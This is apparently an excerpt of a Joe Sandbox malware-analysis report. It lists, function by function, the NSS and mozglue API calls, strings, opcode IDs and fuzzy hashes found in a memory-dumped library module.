                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                              • String ID:
                                                              • API String ID: 1376842649-0
                                                              • Opcode ID: 2ac600d4a716378752f2cef58b33deee8f783476448e320b0c67c30ad1068966
                                                              • Instruction ID: 3ca990d3e9a1263f63087e5199bc71cc096f3e34c6987df8dcc875eeb6e26303
                                                              • Opcode Fuzzy Hash: 2ac600d4a716378752f2cef58b33deee8f783476448e320b0c67c30ad1068966
                                                              • Instruction Fuzzy Hash: 7211E3B6D04705A7EB215624FC09B6B3B78AF5625CF0A4131FE1893211FB22D864CAD1
                                                              APIs
                                                                • Part of subcall function 6D0F11C0: PR_NewLock.NSS3 ref: 6D0F1216
                                                              • free.MOZGLUE(?), ref: 6D0D9E17
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0D9E25
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0D9E4E
                                                              • TlsGetValue.KERNEL32 ref: 6D0D9EA2
                                                                • Part of subcall function 6D0E9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6D0E9546
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0D9EB6
                                                              • PR_Unlock.NSS3 ref: 6D0D9ED9
                                                              • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6D0D9F18
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                              • String ID:
                                                              • API String ID: 3381623595-0
                                                              • Opcode ID: 53dac3a3d9a5121ed51d834994c8d146c045801d3926c7caf3e641ba31200730
                                                              • Instruction ID: 59fb3af4dda98493927fc29a7cb55af26c298cfcda9cfeb0b91468cf28754452
                                                              • Opcode Fuzzy Hash: 53dac3a3d9a5121ed51d834994c8d146c045801d3926c7caf3e641ba31200730
                                                              • Instruction Fuzzy Hash: 5C81D2B5A04702AFFB519F24EC40B7BB7E9BF44288F05452AED4987251FB31E910C7A2
                                                              APIs
                                                                • Part of subcall function 6D0EAB10: DeleteCriticalSection.KERNEL32(D958E852,6D0F1397,5B5F5EC0,?,?,6D0EB1EE,2404110F,?,?), ref: 6D0EAB3C
                                                                • Part of subcall function 6D0EAB10: free.MOZGLUE(D958E836,?,6D0EB1EE,2404110F,?,?), ref: 6D0EAB49
                                                                • Part of subcall function 6D0EAB10: DeleteCriticalSection.KERNEL32(5D5E6D2E), ref: 6D0EAB5C
                                                                • Part of subcall function 6D0EAB10: free.MOZGLUE(5D5E6D22), ref: 6D0EAB63
                                                                • Part of subcall function 6D0EAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6D0EAB6F
                                                                • Part of subcall function 6D0EAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6D0EAB76
                                                              • TlsGetValue.KERNEL32 ref: 6D0EDCFA
                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 6D0EDD0E
                                                              • PK11_IsFriendly.NSS3(?), ref: 6D0EDD73
                                                              • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6D0EDD8B
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0EDE81
                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6D0EDEA6
                                                              • PR_Unlock.NSS3(?), ref: 6D0EDF08
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                              • String ID:
                                                              • API String ID: 519503562-0
                                                              • Opcode ID: 41c5c4cd103b13773877f3276a47843f7b60048c052c3d3c29e9f6d6bb5aa903
                                                              • Instruction ID: 7a0bae3d5616145d4212fd9f9f9ccc83a80d5a056fc7b1194531ecdff6a73a3b
                                                              • Opcode Fuzzy Hash: 41c5c4cd103b13773877f3276a47843f7b60048c052c3d3c29e9f6d6bb5aa903
                                                              • Instruction Fuzzy Hash: 2191BFB5E042069FEB00DF68C884B7AB7F5EFC4388F158028D9199B346E731E951CBA1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: __allrem
                                                              • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                              • API String ID: 2933888876-3221253098
                                                              • Opcode ID: f00f9a337124f8f8c6c62cd66fdc330a0a9fd2f76a0dcbe4efdfefac26263061
                                                              • Instruction ID: aa314c18e72ebd94df48e8dc6bed9be22e9cf9ead535f416fdd7437f5cb0bd98
                                                              • Opcode Fuzzy Hash: f00f9a337124f8f8c6c62cd66fdc330a0a9fd2f76a0dcbe4efdfefac26263061
                                                              • Instruction Fuzzy Hash: D1616E75A002099FEB14CF78DC94B6E77F1FB49354F109128E916AB790EB31AD06CB92
                                                              APIs
                                                              • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6D11AB3E,?,?,?), ref: 6D11AC35
                                                                • Part of subcall function 6D0FCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6D0FCF16
                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6D11AB3E,?,?,?), ref: 6D11AC55
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6D11AB3E,?,?), ref: 6D11AC70
                                                                • Part of subcall function 6D0FE300: TlsGetValue.KERNEL32 ref: 6D0FE33C
                                                                • Part of subcall function 6D0FE300: EnterCriticalSection.KERNEL32(?), ref: 6D0FE350
                                                                • Part of subcall function 6D0FE300: PR_Unlock.NSS3(?), ref: 6D0FE5BC
                                                                • Part of subcall function 6D0FE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6D0FE5CA
                                                                • Part of subcall function 6D0FE300: TlsGetValue.KERNEL32 ref: 6D0FE5F2
                                                                • Part of subcall function 6D0FE300: EnterCriticalSection.KERNEL32(?), ref: 6D0FE606
                                                                • Part of subcall function 6D0FE300: PORT_Alloc_Util.NSS3(?), ref: 6D0FE613
                                                              • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6D11AC92
                                                              • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6D11AB3E), ref: 6D11ACD7
                                                              • PORT_Alloc_Util.NSS3(?), ref: 6D11AD10
                                                              • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6D11AD2B
                                                                • Part of subcall function 6D0FF360: TlsGetValue.KERNEL32(00000000,?,6D11A904,?), ref: 6D0FF38B
                                                                • Part of subcall function 6D0FF360: EnterCriticalSection.KERNEL32(?,?,?,6D11A904,?), ref: 6D0FF3A0
                                                                • Part of subcall function 6D0FF360: PR_Unlock.NSS3(?,?,?,?,6D11A904,?), ref: 6D0FF3D3
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                              • String ID:
                                                              • API String ID: 2926855110-0
                                                              • Opcode ID: 1a95bc48d75458531f95ead349438b6b6daf959e51f18512997f29bf48cfe688
                                                              • Instruction ID: 33622c234b9c8c54a6e2acc8356644b002d2621be5b81533df2ba01f1646e238
                                                              • Opcode Fuzzy Hash: 1a95bc48d75458531f95ead349438b6b6daf959e51f18512997f29bf48cfe688
                                                              • Instruction Fuzzy Hash: E9312BB1E086065FEB00CF659C40EBF7B76AF84328B158038E9149B344EB719D16C7E1
                                                              APIs
                                                              • PR_Now.NSS3 ref: 6D0F8C7C
                                                                • Part of subcall function 6D199DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D1E0A27), ref: 6D199DC6
                                                                • Part of subcall function 6D199DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D1E0A27), ref: 6D199DD1
                                                                • Part of subcall function 6D199DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D199DED
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0F8CB0
                                                              • TlsGetValue.KERNEL32 ref: 6D0F8CD1
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0F8CE5
                                                              • PR_Unlock.NSS3(?), ref: 6D0F8D2E
                                                              • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6D0F8D62
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0F8D93
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                              • String ID:
                                                              • API String ID: 3131193014-0
                                                              • Opcode ID: 6447f290a761aff3119262d291e6d64b7642c929cad7d17de111e3a21725653d
                                                              • Instruction ID: 2d38e67ea27d0b64c1467f745d00683d44204d2198324791f243fa34f0b784c2
                                                              • Opcode Fuzzy Hash: 6447f290a761aff3119262d291e6d64b7642c929cad7d17de111e3a21725653d
                                                              • Instruction Fuzzy Hash: 033120B1E04306ABEB109F6ADC447EAB7B4BF45314F240239EE1967390D770A966CBC1
                                                              APIs
                                                              • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6D139C5B), ref: 6D139D82
                                                                • Part of subcall function 6D1314C0: TlsGetValue.KERNEL32 ref: 6D1314E0
                                                                • Part of subcall function 6D1314C0: EnterCriticalSection.KERNEL32 ref: 6D1314F5
                                                                • Part of subcall function 6D1314C0: PR_Unlock.NSS3 ref: 6D13150D
                                                              • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6D139C5B), ref: 6D139DA9
                                                                • Part of subcall function 6D131340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000,?,6D0CF599,?,00000000), ref: 6D13136A
                                                                • Part of subcall function 6D131340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000,?,6D0CF599,?,00000000), ref: 6D13137E
                                                                • Part of subcall function 6D131340: PL_ArenaGrow.NSS3(?,6D0CF599,?,00000000,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000,?,6D0CF599,?), ref: 6D1313CF
                                                                • Part of subcall function 6D131340: PR_Unlock.NSS3(?,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000,?,6D0CF599,?,00000000), ref: 6D13145C
                                                              • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6D139C5B), ref: 6D139DCE
                                                                • Part of subcall function 6D131340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000,?,6D0CF599,?,00000000), ref: 6D1313F0
                                                                • Part of subcall function 6D131340: PL_ArenaGrow.NSS3(?,6D0CF599,?,?,?,00000000,00000000,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6D131445
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,6D139C5B), ref: 6D139DDC
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6D139C5B), ref: 6D139DFE
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6D139C5B), ref: 6D139E43
                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6D139C5B), ref: 6D139E91
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                                • Part of subcall function 6D131560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6D12FAAB,00000000), ref: 6D13157E
                                                                • Part of subcall function 6D131560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6D12FAAB,00000000), ref: 6D131592
                                                                • Part of subcall function 6D131560: memset.VCRUNTIME140(?,00000000,?), ref: 6D131600
                                                                • Part of subcall function 6D131560: PL_ArenaRelease.NSS3(?,?), ref: 6D131620
                                                                • Part of subcall function 6D131560: PR_Unlock.NSS3(?), ref: 6D131639
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                              • String ID:
                                                              • API String ID: 3425318038-0
                                                              • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                              • Instruction ID: eed3927415e2f1d8cd9d737e788b1c12a0ce537555c54ba762abba51a7334a08
                                                              • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                              • Instruction Fuzzy Hash: 2841B2B4600613AFF700CF14D950BA2BBA1FF55358F068128D9184BAA4EBB2E934CF80
                                                              APIs
                                                              • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6D0FDDEC
                                                                • Part of subcall function 6D130840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D1308B4
                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6D0FDE70
                                                              • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6D0FDE83
                                                              • HASH_ResultLenByOidTag.NSS3(?), ref: 6D0FDE95
                                                              • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6D0FDEAE
                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D0FDEBB
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0FDECC
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                              • String ID:
                                                              • API String ID: 1091488953-0
                                                              • Opcode ID: 267e2e7c808912a2aa1d157c0fbe3eccad21a4ef09aa5129138248ef322274cc
                                                              • Instruction ID: edf604686a69d30b826cc4739b2c05cd4c386cfcb925b7f406314d2a28b86e7c
                                                              • Opcode Fuzzy Hash: 267e2e7c808912a2aa1d157c0fbe3eccad21a4ef09aa5129138248ef322274cc
                                                              • Instruction Fuzzy Hash: 2C31F5B2D042156BFB00AF68AC41B7F76A8EF94608F160035EE09A7241F735D915C6F2
                                                              APIs
                                                              • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6D12D9E4,00000000), ref: 6D12DC30
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6D12D9E4,00000000), ref: 6D12DC4E
                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6D12D9E4,00000000), ref: 6D12DC5A
                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D12DC7E
                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6D12DCAD
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_Util$Arenamemcpy
                                                              • String ID:
                                                              • API String ID: 2632744278-0
                                                              • Opcode ID: ed792d8ec55d2e1407fe1a291cddad77eef0ad19d129620838b737ee3286b51a
                                                              • Instruction ID: 1928b3258bb8485cdd0828b8ed6501ea33b3194d76cbc019a21afd74012526f8
                                                              • Opcode Fuzzy Hash: ed792d8ec55d2e1407fe1a291cddad77eef0ad19d129620838b737ee3286b51a
                                                              • Instruction Fuzzy Hash: 59318CB59042019FD710CF19E880A62B7F8AF94358F15806DE948CB208E7F2E990CBA1
                                                              APIs
                                                              • TlsGetValue.KERNEL32 ref: 6D0E8C1B
                                                              • EnterCriticalSection.KERNEL32 ref: 6D0E8C34
                                                              • PL_ArenaAllocate.NSS3 ref: 6D0E8C65
                                                              • PR_Unlock.NSS3 ref: 6D0E8C9C
                                                              • PR_Unlock.NSS3 ref: 6D0E8CB6
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                              • String ID: KRAM
                                                              • API String ID: 4127063985-3815160215
                                                              • Opcode ID: 5f1f330e2106e29067e02dc88679ec423235b0486d2e9bdca603161302d87478
                                                              • Instruction ID: b9818ff52fa2f045e2c2bee9267f03264d9c45f9c612d8cc7797e1be42f1aca7
                                                              • Opcode Fuzzy Hash: 5f1f330e2106e29067e02dc88679ec423235b0486d2e9bdca603161302d87478
                                                              • Instruction Fuzzy Hash: 1C2171B5904A058FE7009F79C48462DF7F4FF86354F06896ED9888B351EB35D885CB92
                                                              APIs
                                                              • PR_EnterMonitor.NSS3 ref: 6D1E2CA0
                                                              • PR_ExitMonitor.NSS3 ref: 6D1E2CBE
                                                              • calloc.MOZGLUE(00000001,00000014), ref: 6D1E2CD1
                                                              • strdup.MOZGLUE(?), ref: 6D1E2CE1
                                                              • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6D1E2D27
                                                              Strings
                                                              • Loaded library %s (static lib), xrefs: 6D1E2D22
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Monitor$EnterExitPrintcallocstrdup
                                                              • String ID: Loaded library %s (static lib)
                                                              • API String ID: 3511436785-2186981405
                                                              • Opcode ID: 69ca88199ac15053bd680815930bb55700a456c36f8cf176c77fd74dfdd4be7a
                                                              • Instruction ID: d65e577c2761a4fe3370f42b9be6425596052a3bf30a6dd9bc8c4b6510227f1f
                                                              • Opcode Fuzzy Hash: 69ca88199ac15053bd680815930bb55700a456c36f8cf176c77fd74dfdd4be7a
                                                              • Instruction Fuzzy Hash: 811134B86046028FEB318F55EC54B3777B4AB4538CF06803DEA0A87301D7B19858DFA1
                                                              APIs
                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6D0DBDCA
                                                                • Part of subcall function 6D130FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D0D87ED,00000800,6D0CEF74,00000000), ref: 6D131000
                                                                • Part of subcall function 6D130FF0: PR_NewLock.NSS3(?,00000800,6D0CEF74,00000000), ref: 6D131016
                                                                • Part of subcall function 6D130FF0: PL_InitArenaPool.NSS3(00000000,security,6D0D87ED,00000008,?,00000800,6D0CEF74,00000000), ref: 6D13102B
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D0DBDDB
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
